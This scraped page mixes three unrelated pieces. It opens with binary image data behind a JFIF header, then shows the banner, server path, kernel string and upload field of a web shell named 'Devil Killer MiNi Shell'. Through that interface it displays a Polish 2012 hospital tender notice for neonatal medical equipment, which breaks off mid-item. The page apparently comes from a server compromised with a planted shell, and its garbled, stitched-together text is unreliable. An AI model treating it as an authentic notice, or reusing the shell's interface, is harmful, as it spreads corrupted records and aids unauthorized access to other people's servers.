JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120215/45362-N-2012.html

<p class="kh_header"><b>Ruda Śląska: Przetarg nieograniczony nr 04/PN/12 na dostawę aparatury medycznej i drobnego sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 45362 - 2012; data zamieszczenia: 15.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Rudzie Śląskiej Sp. z o.o. , ul. W. Lipa 2, 41-703 Ruda Śląska, woj. śląskie, tel. 32 248 24 52, faks 32 779 59 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o. o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 04/PN/12 na dostawę aparatury medycznej i drobnego sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa aparatury medycznej i drobnego sprzętu medycznego dla Szpitala Miejskiego w Rudzie Śląskiej Sp. z o. o. wartości szacunkowej poniżej 200 000 euro. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 1 do SIWZ.
2. Oferowany przedmiot zamówienia musi spełniać wymagania przewidziane ustawą o wyrobach medycznych z dnia 20.05.2010 r. (Dz. U. z 2010 r. Nr 107, poz. 679).
3. Zamawiający wymaga przeprowadzenia szkolenia w zakresie obsługi, użytkowania i prawidłowej eksploatacji aparatury medycznej. Szkolenie powinno być przeprowadzone w języku polskim lub z udziałem tłumacza               i udokumentowane stosownymi zaświadczeniami potwierdzającymi udział w szkoleniu.
4. Aparatura medyczna winna być dostarczona: Pakiet V poz. 1, XI, XII, XVI poz. 1- 4 na Oddział Neonatologiczny, pakiet V poz. 2 na Oddział Ginekologiczno- Położniczy III p, Pakiet XIV, XV na Blok Porodowy, Pakiet XVII do Izby Przyjęć (Bielszowice) Szpitala Miejskiego w Rudzie Śląskiej Sp. z o. o. w terminie do 21 dni od daty złożenia zamówienia.
Aparatura medyczna zostanie przekazana protokołem zdawczo-odbiorczym podpisanym przez przedstawicieli obu stron. Okres gwarancji płynie od dnia podpisania protokołu. 
5. Przedmiot zamówienia określony w pakiecie I - IV, VI - X, XIII, XVI poz. 5- 8, XVIII winien być dostarczony do Magazynu, w pakiecie XIX winien być dostarczony do Apteki Szpitala Miejskiego w Rudzie Śląskiej Sp. z o. o. w terminie do 3 dni od daty złożenia zamówienia.
6. Dostawa nastąpi na koszt Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.15.77.00-2, 33.19.00.00-8, 33.16.22.00-5, 31.52.41.10-9, 38.41.20.00-6, 38.42.00.00-5, 39.14.31.12-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania uprawnienia do wykonania określonej działalności lub czynności, należy złożyć oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego posiadania wiedzy i doświadczenia, należy złożyć oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania odpowiednim potencjałem technicznym, należy złożyć oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia, należy złożyć oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku dotyczącego sytuacji ekonomicznej i finansowej, należy złożyć oświadczenie sporządzone wg załącznika nr 3 do SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 3 do SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie, że oferowany przedmiot zamówienia spełnia wymagania przewidziane ustawą o wyrobach medycznych z dnia 20.05.2010 r. (Dz. U. z 2010 r. Nr 107, poz. 679) sporządzone wg załącznika nr 5 do SIWZ. W przypadku pozycji, które nie są wyrobami medycznymi Wykonawca złoży oświadczenie, że w/w pozycje nie podlegają ustawie o wyrobach medycznych. 
Wykonawca jest zobowiązany do przedstawienia odpowiednich dokumentów potwierdzających  prawidłowość złożonego oświadczenia na każde żądanie Zamawiającego.
2. Aktualny dokument w rozumieniu ustawy o wyrobach medycznych z dnia z dnia 20.05.2010 r. (Dz. U. z 2010 r. Nr 107, poz. 679) tj. deklaracja zgodności lub Certyfikat CE lub wpis do Rejestru Wyrobów Medycznych (pakiet: V, XI, XII, XIV, XV, XVI poz. 1-4, XVII).
3. Katalog firmowy oferowanej aparatury medycznej potwierdzający spełnianie wymaganych przez Zamawiającego parametrów, określonych w załączniku nr 1 do niniejszej SIWZ. W przypadku, gdy na podstawie informacji zawartych w katalogu firmowym nie można potwierdzić któregoś z oferowanych parametrów, podanych przez Wykonawcę w załączniku nr 1 do SIWZ, lub oferowaną aparaturę medyczną    i drobny sprzęt medyczny nie posiada katalogów, Wykonawca winien dołączyć do oferty inny dokument producenta (np. instrukcja obsługi, specyfikacja techniczna) potwierdzający posiadane przez oferowane urządzenie tych parametrów (pakiet: V, XI, XII, XIV, XV, XVI poz. 1-4, XVII).

W przypadku, gdy na podstawie żadnego z w/w dokumentów nie można potwierdzić oferowanych parametrów, Wykonawca winien dołączyć do oferty oświadczenie producenta sprzętu potwierdzające, że oferowany sprzęt medyczny posiada parametry techniczne i funkcjonalne podane przez Wykonawcę 
w załączniku nr 1 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy sporządzony wg załącznika nr 1 do SIWZ.
2. Oświadczenie Wykonawcy sporządzone wg załącznika nr 2 do SIWZ.
3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
W przypadku podmiotów wspólnie ubiegających się o zamówienie, pełnomocnictwo takie może wynikać z dołączonej do oferty umowy konsorcjum lub umowy spółki cywilnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w przypadku:
a) gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy:
- zmiana producenta lub zaprzestanie produkcji przez dotychczasowego producenta z przyczyn niezależnych od Wykonawcy, z zastrzeżeniem, że Wykonawca zaoferuje produkty o takich samych (lub lepszych) parametrach technicznych i użytkowych, w takiej samej cenie,
- zmiana jakości usługi lub towaru polepszająca lub zastępująca daną usługę lub towar bez utraty jakości lub interesu Zamawiającego,
- zamiany adresowe Stron,
- zmiana przepisów obowiązujących w dniu zawarcia umowy, 
- siła wyższa,
b) niewykorzystania wartości umowy w zakresie poszczególnych pakietów określonych w § 5 ust. 1, w terminie określonym § 3 ust. 1, Zamawiający przewiduje możliwość przedłużenia okresu obowiązywania umowy na czas określony, nie dłużej jednak niż do wykorzystania wartości umowy.
2. W każdym z powyższych przypadków zmiana umowy wymaga zgody obu stron, wyrażonej na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalruda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Rudzie Ślaskiej Sp. z o. o., ul. Lipa 2, Dział Zamówień Publicznych i Logistyki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2012 godzina 09:30, miejsce: Szpital Miejski w Rudzie Ślaskiej Sp. z o. o., ul. Lipa 2, Dział Zamówień Publicznych i Logistyki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kleszczyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kleszczyki Magilla małe, długości 135 mm, ze stali nierdzewnej, do stosowania u noworodków 4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Stetoskop neonatologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stetoskop neonatologiczny, dwustrony o następujących cechach: głowica wykonana z najwyższej jakości stali nierdzewnej, średnica membramy 23 mm, możliwość odsłuchania tonów - niskich (delikatny nacisk głowicy), - wysokich (mocny nacisk głowicy), miękkie oliwki, ciepłe obwódki głowicy 25 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materace p/odleżynowe do inkubatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materace p/odleżynowe do inkubatorów - żelowe podkłady do stosowania na oddziałach neonatologii chroniące wcześniaki w inkubatorach przed powstaniem odleżyn 6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Resuscytator noworodkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Resuscytator noworodkowy 280 ml, zastawka jednokierunkowa kompletna z zastawką nadciśnieniową 40 cm H2O POP OFF, maska nr 0, zastawka akumulatora tlenu, akumulator tlenu, silikonowe worki do resuscytacji typu Ambu przeznaczone są dla wszystkich wielkości pacjentów, w trzech rozmiarach dla noworodków 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.77.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ssak sieciowy i przyrząd ssący elektryczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ssak - sieciowy z możliwością zasilania 220 V, możliwość  zastosowania u dzieci i noworodków, regulator podciśnienia w zakresie 0-70  Kpa, przepływ min. 30 l/min. Rozbudowany metalowy uchwyt na przewód ssący pozwalający na zwinięcie i ochronę przewodu w trakcie przenoszenia. Zbiornik wielorazowy z tworzywa sztucznego o poj. 0,9 L, sterylizacja w temp. 134 C. Ssak wyposażony w filtr antybakteryjny oraz zastawkę p/przelewową wykonaną z tworzywa sztucznego ABS, odporny na środki dezynfekcyjne -5 szt.
2. Przyrząd ssący elektryczny - napięcie zasilanianie 230V/50Hz, moc 110 W, max przepływ 40 l/min, max ciś. Robocze 80-90 k, do pracy ciągłej 
z wyposażeniem: butla poliwęglanowa 2 l - 2 szt., wskaźnik i regulator podciśnienia, dereny, filtr bakteryjny, łącznik drenów, wózek - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Oxymetr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oxymetr - urządzenie do pomiaru stężenia tlenu w inkubatorze           (posiadane inkubatory Atom, Amelette, Drager) 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Termometr elektroniczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termometr elektroniczny, pomiar temperatury w ciągu dziesięciu sekund, dźwiękowa sygnalizacja gorączki, pamięć ostatniego pomiaru, praktyczne plastikowe etui, zakres mierzonej temperatury 32 C - 42 C, wodoodporny 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Reduktory do tlenu i dozowniki do tlenu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Reduktor do tlenu (O2) nabutlowy, z dozownikiem i nawilżaczem, po połączeniu z butlą tlenową przeznaczony jest do redukcji ciśnienia, ustalania wymaganego przepływu i nawilżania tlenu pobieranego   z butli, jednocześnie istnieje możliwość uzyskania nawilżonej mieszanki tlenowo- powietrznej, reduktor po podłączeniu do butli z tlenem medycznym o ciśnieniu 2 - 15 Mpa daje ciśnienie kowane 0,4   Mpa, ciśnienie w butli wskazuje manometr zamocowany na reduktorze, regulacja przepływu umożliwia podawanie pacjentowi od 0 do 15 l/min nawilżonego tlenu, nawilżenie tlenu uzyskuje się poprzez jego przepływ przez pojemnik napełniony do wskazanego poziomu wodą destylowaną, mieszaninę tlenową uzyskuje się przez obrót pierścienia zasysania powietrza 5 szt.
2. Dozownik do tlenu medycznego naścienny, wielorazowy, typ AGA (wtyk AGA) możliwość dozowania 0-5 L, 0-15 L, dozownik do tlenu z przepływomierzem i nawilżaczem 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> System CPAP bąbelkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> System CPAP bąbelkowy nawilżacz respiratorowy - do CPAP wyświetlacz cyfrowy do pomiaru temperatury przycisk opcji wentylacji nieinwazyjnej (intubacja) inwazyjne (maska) pr wyciszenia alarmu - zakres kontroli temperatury  tryb inwazyjny wylot komory 35,5 - 40 C, dren 35 - 40 C tryb nieinwazyjny wylot komory 31- 36 C, alarmy wysokiej wilgotności wyposażenie wielorazowego użytku, mocowanie na rurę, adapter elektryczny do grzałki drenów jednorazowego użytku, czujnik temperatury, stojak na kółkach podstawa zaopatrzona w pięć nóg wyposażonych w szynę modura niezbędną do zamontowania przepływomierzy zestaw mocowań. Zestaw przepływomierzy: tlenu i powietrza zawierają mocowanie na szynę modura, dren doprowadzający gaz ze ściany min. 3 m, dren tlenowy do dwóch przepływomierzy z Y. Układ oddechowy jednorazowego użytku do funkcji CPAP posiadający spiralną grzałką w drenie na linii wdechowej z dwoma kolorami rur odróżniający wdech i wydech. Wejście w grzałce musi zawierać trójkątne wcięcie tak aby umożliwiało podłączenie czujnika temp. stosowanego również do modelu nawilżacza MR 850 firmy Fisher&Payker. Komplet musi zawierać komorę z automatycznym pobieraniem wody posiadającą dwa pływaki zabezpieczające przed przedostaniem się wody do układu oddechowego. Układ musi zawierać mocowanie noska, które musi być kompatybilne z układem rur j. u. wyżej opisanego. Nosek w następujących rozm., kompatybilne w. w. elementami. Nosek przekrój wylotu gazu z kaniuli 3,5 mm rozstaw kaniuli 2,0 mm; Nosek przekrój wylotu gazu z kaniuli 